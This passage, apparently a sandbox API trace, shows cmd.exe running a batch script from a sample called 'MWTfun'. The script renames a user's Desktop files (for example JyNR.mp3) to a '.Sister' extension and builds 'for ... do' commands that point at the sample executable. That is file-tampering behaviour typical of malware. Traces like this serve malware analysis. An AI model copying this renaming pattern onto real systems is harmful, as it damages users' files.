nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0150.477] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0150.477] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0150.477] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0150.477] _get_osfhandle (_FileHandle=1) returned 0x50 [0150.477] GetFileType (hFile=0x50) returned 0x2 [0150.478] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0150.478] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0150.543] _get_osfhandle (_FileHandle=1) returned 0x50 [0150.543] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x18) returned 1 [0150.551] _get_osfhandle (_FileHandle=1) returned 0x50 [0150.551] GetFileType (hFile=0x50) returned 0x2 [0150.552] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0150.552] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0150.574] _get_osfhandle (_FileHandle=1) returned 0x50 [0150.574] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9377550*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed9377550*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0150.591] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0150.591] _get_osfhandle (_FileHandle=1) returned 0x50 [0150.591] GetFileType (hFile=0x50) returned 0x2 [0150.591] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0150.591] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0150.613] _get_osfhandle (_FileHandle=1) returned 0x50 [0150.613] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0150.639] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0150.639] _get_osfhandle (_FileHandle=1) returned 0x50 [0150.639] GetFileType (hFile=0x50) returned 0x2 [0150.639] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0150.639] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0150.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0150.645] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0150.671] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0150.680] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0150.680] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0150.681] malloc (_Size=0xffce) returned 0x21ed91bfe00 [0150.681] ??_V@YAXPEAX@Z () returned 0x21ed91bfe00 [0150.681] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0150.681] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0150.681] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0150.681] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0150.681] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0150.681] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0150.681] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0150.681] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0150.681] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0150.681] ??_V@YAXPEAX@Z () returned 0x1 [0150.681] GetProcessHeap () returned 0x21ed8c70000 [0150.681] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d61f00 [0150.681] GetProcessHeap () returned 0x21ed8c70000 [0150.681] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d61f00, Size=0x130) returned 0x21ed8d61f00 [0150.681] GetProcessHeap () returned 0x21ed8c70000 [0150.681] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d61f00) returned 0x130 [0150.681] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0150.681] malloc (_Size=0xffce) returned 0x21ed91bfe00 [0150.682] ??_V@YAXPEAX@Z () returned 0x21ed91bfe00 [0150.682] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0150.682] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed91bfe00, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0150.684] ??_V@YAXPEAX@Z () returned 0x1 [0150.684] GetProcessHeap () returned 0x21ed8c70000 [0150.684] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d62090 [0150.684] GetProcessHeap () returned 0x21ed8c70000 [0150.684] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d63450 [0150.684] GetProcessHeap () returned 0x21ed8c70000 [0150.684] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d63450, Size=0x130) returned 0x21ed8d63450 [0150.684] GetProcessHeap () returned 0x21ed8c70000 [0150.684] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d63450) returned 0x130 [0150.684] malloc (_Size=0xffce) returned 0x21ed91bfe00 [0150.684] ??_V@YAXPEAX@Z () returned 0x21ed91bfe00 [0150.684] GetProcessHeap () returned 0x21ed8c70000 [0150.684] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d42f70 [0150.684] GetProcessHeap () returned 0x21ed8c70000 [0150.684] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9375560 [0150.684] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0150.684] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0150.685] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0150.685] GetLastError () returned 0x2 [0150.685] GetProcessHeap () returned 0x21ed8c70000 [0150.685] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed93e0200 [0150.685] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed93e0210 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0150.685] SetErrorMode (uMode=0x0) returned 0x0 [0150.685] SetErrorMode (uMode=0x1) returned 0x0 [0150.685] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed91bfe00, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0150.685] SetErrorMode (uMode=0x0) returned 0x1 [0150.685] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0150.685] GetProcessHeap () returned 0x21ed8c70000 [0150.685] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9372bf0 [0150.685] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0150.685] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0150.686] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0150.686] GetLastError () returned 0x2 [0150.686] ??_V@YAXPEAX@Z () returned 0x1 [0150.686] malloc (_Size=0xffce) returned 0x21ed91bfe00 [0150.686] ??_V@YAXPEAX@Z () returned 0x21ed91bfe00 [0150.686] malloc (_Size=0xffce) returned 0x21ed91cfde0 [0150.686] ??_V@YAXPEAX@Z () returned 0x21ed91cfde0 [0150.686] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0150.686] GetLastError () returned 0x2 [0150.686] _get_osfhandle (_FileHandle=2) returned 0x54 [0150.686] GetFileType (hFile=0x54) returned 0x2 [0150.686] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0150.686] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0150.688] _get_osfhandle (_FileHandle=2) returned 0x54 [0150.688] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0150.691] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0150.691] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0150.691] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0150.708] longjmp () [0150.708] ??_V@YAXPEAX@Z () returned 0x1 [0150.708] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41f92750, ftCreationTime.dwHighDateTime=0x1d5eb7b, ftLastAccessTime.dwLowDateTime=0xd2a616e0, ftLastAccessTime.dwHighDateTime=0x1d5ea6e, ftLastWriteTime.dwLowDateTime=0xd2a616e0, ftLastWriteTime.dwHighDateTime=0x1d5ea6e, nFileSizeHigh=0x0, nFileSizeLow=0x14f69, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="JyNR.mp3", cAlternateFileName="")) returned 1 [0150.708] GetProcessHeap () returned 0x21ed8c70000 [0150.708] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d66af0, Size=0x2a4) returned 0x21ed8d63590 [0150.708] GetProcessHeap () returned 0x21ed8c70000 [0150.708] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d63590) returned 0x2a4 [0150.708] GetProcessHeap () returned 0x21ed8c70000 [0150.708] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93f01f0 [0150.709] GetProcessHeap () returned 0x21ed8c70000 [0150.709] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93f01f0, Size=0x30) returned 0x21ed93f01f0 [0150.709] GetProcessHeap () returned 0x21ed8c70000 [0150.709] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93f01f0) returned 0x30 [0150.709] GetProcessHeap () returned 0x21ed8c70000 [0150.709] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93f0230 [0150.709] malloc (_Size=0x1ff9c) returned 0x21ed91dfdc0 [0150.710] GetProcessHeap () returned 0x21ed8c70000 [0150.710] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x22) returned 0x21ed8d45e90 [0150.710] ??_V@YAXPEAX@Z () returned 0x1 [0150.710] GetProcessHeap () returned 0x21ed8c70000 [0150.710] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93f0230, Size=0x100) returned 0x21ed93f0230 [0150.710] GetProcessHeap () returned 0x21ed8c70000 [0150.710] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93f0230) returned 0x100 [0150.710] GetProcessHeap () returned 0x21ed8c70000 [0150.710] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93f0340 [0150.710] GetProcessHeap () returned 0x21ed8c70000 [0150.710] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93f0340, Size=0x290) returned 0x21ed93f0340 [0150.710] GetProcessHeap () returned 0x21ed8c70000 [0150.710] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93f0340) returned 0x290 [0150.710] GetProcessHeap () returned 0x21ed8c70000 [0150.710] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93f05e0 [0150.710] GetProcessHeap () returned 0x21ed8c70000 [0150.710] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93f05e0, Size=0x30) returned 0x21ed93f05e0 [0150.710] GetProcessHeap () returned 0x21ed8c70000 [0150.710] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93f05e0) returned 0x30 [0150.710] GetProcessHeap () returned 0x21ed8c70000 [0150.710] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93f0620 [0150.711] malloc (_Size=0x1ff9c) returned 0x21ed91dfdc0 [0150.711] GetProcessHeap () returned 0x21ed8c70000 [0150.711] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x22) returned 0x21ed8d45bf0 [0150.711] ??_V@YAXPEAX@Z () returned 0x1 [0150.711] malloc (_Size=0x1ff9c) returned 0x21ed91dfdc0 [0150.711] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d434b0 [0150.711] FindClose (in: hFindFile=0x21ed8d434b0 | out: hFindFile=0x21ed8d434b0) returned 1 [0150.711] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d439f0 [0150.711] FindClose (in: hFindFile=0x21ed8d439f0 | out: hFindFile=0x21ed8d439f0) returned 1 [0150.711] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x844288f7, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x844288f7, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d439f0 [0150.712] FindClose (in: hFindFile=0x21ed8d439f0 | out: hFindFile=0x21ed8d439f0) returned 1 [0150.712] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\JyNR.mp3", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41f92750, ftCreationTime.dwHighDateTime=0x1d5eb7b, ftLastAccessTime.dwLowDateTime=0xd2a616e0, ftLastAccessTime.dwHighDateTime=0x1d5ea6e, ftLastWriteTime.dwLowDateTime=0xd2a616e0, ftLastWriteTime.dwHighDateTime=0x1d5ea6e, nFileSizeHigh=0x0, nFileSizeLow=0x14f69, dwReserved0=0x4, dwReserved1=0x80, cFileName="JyNR.mp3", cAlternateFileName="")) returned 0x21ed8d42d90 [0150.712] FindClose (in: hFindFile=0x21ed8d42d90 | out: hFindFile=0x21ed8d42d90) returned 1 [0150.712] malloc (_Size=0x1ff9c) returned 0x21ed91ffd70 [0150.716] ??_V@YAXPEAX@Z () returned 0x21ed91ffd70 [0150.717] GetProcessHeap () returned 0x21ed8c70000 [0150.717] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1a) returned 0x21ed8d45e30 [0150.717] ??_V@YAXPEAX@Z () returned 0x1 [0150.717] ??_V@YAXPEAX@Z () returned 0x1 [0150.717] GetProcessHeap () returned 0x21ed8c70000 [0150.717] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93f0620, Size=0x100) returned 0x21ed93f0620 [0150.717] GetProcessHeap () returned 0x21ed8c70000 [0150.717] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93f0620) returned 0x100 [0150.717] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0150.717] _get_osfhandle (_FileHandle=1) returned 0x50 [0150.717] GetFileType (hFile=0x50) returned 0x2 [0150.717] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0150.717] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0150.774] _get_osfhandle (_FileHandle=1) returned 0x50 [0150.775] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0150.797] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0150.797] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0150.797] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0150.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0150.797] GetFileType (hFile=0x50) returned 0x2 [0150.797] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0150.797] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0150.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0150.813] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0150.826] _get_osfhandle (_FileHandle=1) returned 0x50 [0150.826] GetFileType (hFile=0x50) returned 0x2 [0150.826] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0150.826] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0150.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0150.843] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed93f0200*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed93f0200*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0150.850] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"JyNR.mp3\" \"JyNR.mp3.Sister\" ") returned 30 [0150.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0150.850] GetFileType (hFile=0x50) returned 0x2 [0150.850] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0150.850] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0150.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0150.851] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x1e) returned 1 [0150.853] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0150.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0150.853] GetFileType (hFile=0x50) returned 0x2 [0150.853] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0150.853] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0150.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0150.856] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0150.859] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0150.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0150.859] GetFileType (hFile=0x50) returned 0x2 [0150.859] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0150.859] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0150.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0150.860] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0150.927] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0150.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0150.928] GetFileType (hFile=0x50) returned 0x2 [0150.928] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0150.928] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0150.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0150.936] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0150.950] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0150.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0150.951] GetFileType (hFile=0x50) returned 0x2 [0150.951] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0150.951] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0151.089] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.089] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0151.131] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.131] GetFileType (hFile=0x50) returned 0x2 [0151.131] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0151.131] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0151.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.153] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed93f05f0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed93f05f0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0151.185] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"JyNR.mp3.Sister\" \"JyNR.bat\" ") returned 30 [0151.185] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.185] GetFileType (hFile=0x50) 